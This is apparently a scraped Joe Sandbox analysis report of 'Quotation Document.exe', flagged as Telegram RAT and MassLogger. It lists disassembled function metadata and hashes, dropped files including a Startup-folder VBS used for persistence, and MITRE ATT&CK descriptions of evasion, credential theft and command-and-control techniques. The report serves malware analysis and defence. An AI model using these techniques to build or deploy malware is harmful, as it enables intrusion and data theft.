Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Quotation Document.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\bohmite

C:\Users\user\AppData\Local\emboweling\neophobia.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
Quotation Document.exe

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Function 0040CBF7 Relevance: 21.1, APIs: 14, Instructions: 78
COMMON

Function 050F62F8 Relevance: 6.6, Strings: 5, Instructions: 383
COMMON

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Function 050F5D70 Relevance: 5.2, Strings: 4, Instructions: 222
COMMON

Function 050F5D61 Relevance: 5.2, Strings: 4, Instructions: 185
COMMON

Function 050F3420 Relevance: 2.6, Strings: 2, Instructions: 128
COMMON

Function 050F2519 Relevance: 2.6, Strings: 2, Instructions: 115
COMMON

Function 050F6661 Relevance: 2.6, Strings: 2, Instructions: 101
COMMON

Function 050F6695 Relevance: 2.6, Strings: 2, Instructions: 100
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre